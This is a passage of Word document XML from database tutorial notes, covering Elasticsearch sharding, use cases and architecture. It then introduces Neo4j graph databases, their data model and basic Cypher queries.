      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3 primary shards → 3 nodes can ingest in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4D0567" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  More primary shards → higher write throughput (but can't change after index creation!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5154F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="389F702F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Reads scale with replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F97E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1 primary + 2 replicas = 3 copies → 3x read throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093A182" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Any shard copy (primary or replica) can serve reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7C63A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="716C7C47" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-shard queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8AE7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query hits ALL shards → each returns top-N → coordinator merges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B1DF9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  More shards = more parallelism, but more coordination overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74399925" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. When to Use Elasticsearch</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466"/>
        <w:gridCol w:w="4329"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="07FEA53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B5096A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✓ Good Fit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3713C8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Bad Fit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="58F62C2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1411DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Full-text search across large text bodies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FDDC38" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Primary transactional database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="326DEBD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07DB61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Log/event analytics (ELK stack)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781FF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Strong consistency requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="3FF62B0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FE6789" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Autocomplete and suggestions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D6BBF9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Frequent updates to same documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="51095A2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DE8BA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Faceted search (e-commerce filters)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9F8DA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Complex relational data (JOINs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="061B255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D3EC32" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Geospatial queries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192131" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Small datasets (&lt; 1M docs) — overkill</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="395A6BA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74AB49" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Real-time analytics and dashboards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DBF532" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Write-heavy with strict durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2786C31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E10CD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Anomaly detection in metrics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B62A6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Financial transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77F7DA64" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common architecture pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A822AA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA6FE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Primary database (PostgreSQL/MySQL) ← source of truth, ACID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92DB4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF3638C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    │ CDC (Debezium) or application-level sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733EDE81" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEAE363" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Elasticsearch ← search/analytics layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472235CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067664A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    │ Query results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFD4C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F91962E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Application (search results, dashboards, autocomplete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B20AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="5BE64CAC">
          <v:rect id="_x0000_i5908" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A616F02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 4: Graph Databases — Neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC5141" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Graph Databases Are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F606ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>A graph database stores data as nodes (entities) and edges (relationships), using graph structures for storage and querying. It's optimized for traversing relationships — finding how entities are connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374838B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental insight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E75658" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E848B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Relational databases store relationships IMPLICITLY (via foreign keys + JOINs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A2052" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Users table: [id, name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6B817" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Friendships table: [user_id, friend_id]  ← relationship as a row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E011D14" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5501F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "Find friends of friends" = JOIN × JOIN × JOIN ... (O(n) per level, exponential with depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F9684" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="645E3D50" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Graph databases store relationships EXPLICITLY (as first-class citizens):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E630D8B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Nodes: (User:Alice), (User:Bob), (User:Charlie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B3B0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Edges: Alice -[:FRIENDS_WITH]-&gt; Bob -[:FRIENDS_WITH]-&gt; Charlie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE54C59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAEB805" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "Find friends of friends" = follow pointers (O(1) per hop, linear with depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D64873" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters at scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A612D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D51EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>"Find all friends-of-friends for user with 1000 friends, each having 1000 friends":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC7B5C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="48057434" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Relational (JOIN):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447CB6E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  First level: SELECT from friendships WHERE user_id = ? → 1000 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2153FAF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Second level: SELECT from friendships WHERE user_id IN (1000 ids) → scan/index 1M combinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF1AC3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42868C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  With index: O(k²) where k = average friend count. For k=1000: 1,000,000 index lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C30B5A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Time: 1–10 seconds (depending on dataset size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B586D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="16027804" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Graph (traversal):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C2F4D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Start at Alice node → follow 1000 FRIENDS edges → reach 1000 friend nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36B4B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  From each friend → follow their FRIENDS edges → reach up to 1,000,000 friend-of-friend nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFB2B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337CEFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each "follow edge" = O(1) pointer dereference (no index lookup, no JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0C2504" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Time: 10–100 milliseconds (regardless of total dataset size!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF4B5EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The key property: index-free adjacency.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Each node directly points to its neighbors. Traversal cost depends on the LOCAL structure (how many edges from here), not the GLOBAL size of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F3A9F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Neo4j Data Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC98BD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Nodes, Relationships, and Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C57FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239849C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Nodes (entities):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452E1B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (:Person {name: "Alice", age: 30, city: "NYC"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA9C01D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (:Person {name: "Bob", age: 28, city: "London"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BC676" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (:Company {name: "Acme Corp", founded: 2010})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939AA54" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (:Skill {name: "Python"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34485652" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="562460BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Relationships (edges — typed, directed, with properties):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FB0B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Alice)-[:FRIENDS_WITH {since: 2020}]-&gt;(Bob)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B1A99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Alice)-[:WORKS_AT {role: "Engineer", since: 2022}]-&gt;(Acme Corp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D482950" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Alice)-[:HAS_SKILL {level: "expert"}]-&gt;(Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6465B1B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Bob)-[:WORKS_AT {role: "Manager", since: 2021}]-&gt;(Acme Corp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F702E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="645F5F1D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Labels (categories): Person, Company, Skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0C389" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  A node can have multiple labels: (:Person:Employee:Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA3D1B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Cypher Query Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D370295" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cypher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726AFCCC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Create nodes and relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7102E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE (alice:Person {name: "Alice", age: 30})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388A425" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE (bob:Person {name: "Bob", age: 28})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DE592" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE (alice)-[:FRIENDS_WITH {since: 2020}]-&gt;(bob)</w:t>
      </w:r>
    </w:p>
